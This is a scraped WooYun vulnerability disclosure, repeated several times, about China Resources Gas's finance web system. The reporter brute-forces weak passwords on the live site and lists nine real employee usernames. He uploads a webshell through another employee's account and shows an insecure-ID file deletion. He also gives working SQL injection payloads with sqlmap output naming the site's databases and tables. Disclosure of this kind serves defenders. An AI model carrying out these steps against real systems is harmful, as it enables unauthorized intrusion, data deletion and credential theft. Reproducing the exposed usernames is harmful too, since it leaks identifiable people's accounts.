华润燃气某系统存在登录缺陷可穷举用户爆破弱口令+越权删除任意文件+SQL注入（泄漏敏感信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155847

漏洞标题：华润燃气某系统存在登录缺陷可穷举用户爆破弱口令+越权删除任意文件+SQL注入（泄漏敏感信息）

漏洞作者：路人甲

提交时间：2015-11-25 17:09

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商已经确认，细节仅向厂商公开
2015-12-05：细节向核心白帽子及相关领域专家公开
2015-12-15：细节向普通白帽子公开
2015-12-25：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

没有验证码，导致可以爆破！~~~可以越权遍历没有上传未确定的文件并任意删除！~~~用户登录后发现有SQL注入，仅测试一处，其余的厂家自己排除吧！~~~

详细说明：

地址：
http://cw.crcgas.com/index.asp
一、无验证，可爆破用户弱口令
随便输入admin/123456登录抓包，然后用burpsuite对username参数做变量，top500用户，共3000组合进行爆破，获得不存在的用户，密码错误的用户，以及登录成功的用户，登录成功
也就存在123456弱口令了！~~~
然后将获得的密码不正确的用户再次对密码top100弱口令进行爆破，发现又存在两枚
最后对用户使用用户名做密码进行爆破，没想到又存在一枚！~~~测试下来共获得9枚用户弱口令，如果密码够强大，同时全部用户名在手，那么爆破出来都没有什么问题了！~~~
22日测试的时候，还可以上传xls文件，然后修改成asp就可以得到webshell了，好像今天24日就不行了，已经修复了吧~~~
今天手抖，不小心将一句话利用zhanglei的帐号登录，上传后确认了，所以会提交到zhanglei的领导那里吧，不过应该也不会怎么影响了！~~~删除吧！~~~不好意思了，zhanglei！
~~~~
作为财务系统，那么危害性还是挺大的！~~~
弱口令账户，不同的弱口令，就不写出来弱口令了！~~~管理员自己排查其他用户的弱口令吧~~~~（此处帮忙打码）

liyan
liuling
zhanglei
chenchen
huangwei
wanglijuan
wangying
wangshuai
liming

贴几个图吧！~~~

二、
可以越权删除上传的未确定的文件
用一个帐号登录上传一个文件，
http://cw.crcgas.com/cwdown.asp?id=59650
用另一个帐号上传一个文件
http://cw.crcgas.com/cwdown.asp?id=59651
获得两个上传文件的id号码！~~~
然后用第二个帐号点击取消！~~~抓包
http://cw.crcgas.com/cw1_del.asp?id=59651
修改为
http://cw.crcgas.com/cw1_del.asp?id=59650
然后go，这样就可以删除第一个帐号上传的没有确定的文件了！~~~
那么只要对id进行遍历，那么就可以越权删除所有上传没有确认的文件！~~~

三、SQL注入
登录可以找到SQL注入！~~~
注入点：
http://cw.crcgas.com/cwzc_gj.asp?id=2 (GET)
id参数存在注入，出于时间原因，还有其他的参数应该存在注入，我就不继续测试了！~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7014=7014
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[13:37:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[13:37:09] [INFO] fetching current user
[13:37:09] [INFO] retrieving the length of query output
[13:37:09] [INFO] retrieved: 9
[13:37:11] [INFO] retrieved: sq_crcgas
current user:    'sq_crcgas'
[13:37:11] [INFO] fetching current database
[13:37:11] [INFO] retrieving the length of query output
[13:37:11] [INFO] retrieved: 9
[13:37:13] [INFO] retrieved: sq_crcgas
current database:    'sq_crcgas'
[13:37:13] [INFO] testing if current user is DBA
current user is DBA:    False
available databases [30]:
[*] a0103123601
[*] a0107163637
[*] a0227155438
[*] a05211243092
[*] a0526174232
[*] a0604103832
[*] a0615115402
[*] a0617184309
[*] a0627170803
[*] a07081000429
[*] a08041539597
[*] a1204143833
[*] a1205155319
[*] master
[*] model
[*] msdb
[*] sq_13537897696
[*] sq_crcgas
[*] sq_crcgashr
[*] sq_daerp
[*] sq_dreamson
[*] sq_haian99
[*] sq_huafei
[*] sq_Manager
[*] sq_orderSystem
[*] sq_qmmanager
[*] sq_rmis
[*] sq_yangsizhuan1
[*] sq_yongjidb
[*] tempdb
Database: sq_crcgas
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| sq_crcgas.cwup             | 21387   |		财务上传的数据？？？
| sq_crcgas.EduTbl           | 20782   |
| sq_crcgas.zcre             | 13356   |
| sq_crcgas.PersonTbl        | 8725    |
| sq_crcgas.AreaTbl          | 2687    |
| sq_crcgas.zcuser           | 1260    |		注册？资产？用户
| sq_crcgas.rere             | 1127    |
| dbo.sjre                   | 1027    |
| sq_crcgas.cwuser           | 693     |		财务用户
| sq_crcgas.reuser           | 636     |		RE用户
| sq_crcgas.aqre             | 520     |
| sq_crcgas.address          | 207     |
| dbo.cwnotefile             | 164     |
| sq_crcgas.EduTb2           | 145     |
| sq_crcgas.PositionTbl      | 144     |
| sq_crcgas.CompanyTbl       | 111     |
| sq_crcgas.caiwu            | 100     |		财务？
| sq_crcgas.EduTb3           | 90      |
| dbo.sjusers                | 71      |			三九？用户
| sq_crcgas.comp             | 71      |
| dbo.cwnote                 | 67      |
| sq_crcgas.yyre             | 67      |
| sq_crcgas.yyuser           | 67      |		医药？用户
| sq_crcgas.EduTb4           | 61      |
| sq_crcgas.ViewJlTbl        | 59      |
| dbo.cwmessage              | 37      |
| sq_crcgas.reper            | 22      |
| sq_crcgas.EducateTbl       | 15      |
| sq_crcgas.cwcode           | 13      |
| sq_crcgas.QualificationTbl | 10      |
| sq_crcgas.WorkExpSelTbl    | 10      |
| sq_crcgas.AdminTbl         | 6       |
| sq_crcgas.PersonTbldd      | 6       |
| sq_crcgas.MemberConfigTbl  | 5       |
| sq_crcgas.PersonConfigTbl  | 5       |
| sq_crcgas.PoliticalTbl     | 4       |
| dbo.f2015sj                | 3       |
| sq_crcgas.usersadmin       | 2       |		管理员用户
| sq_crcgas.SiteConfigTbl    | 1       |
+----------------------------+---------+

可以获取财务、管理员的帐号密码！~~~那么登录进去后果很严重！~~~
发现大量的密码都是弱口令。

测试到此，就不继续了！~~~

漏洞证明：

修复方案：

你们知道的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-11-25 17:23

厂商回复：

感谢提交，不过如果早提交就没前面那个了，不过这个系统研发人员估计不懂安全

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155847

漏洞标题：华润燃气某系统存在登录缺陷可穷举用户爆破弱口令+越权删除任意文件+SQL注入（泄漏敏感信息）

相关厂商：华润燃气(集团)有限公司

漏洞作者：路人甲

提交时间：2015-11-25 17:09

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155847

漏洞标题：华润燃气某系统存在登录缺陷可穷举用户爆破弱口令+越权删除任意文件+SQL注入（泄漏敏感信息）

相关厂商：华润燃气(集团)有限公司

漏洞作者： 路人甲

提交时间：2015-11-25 17:09

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155847"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云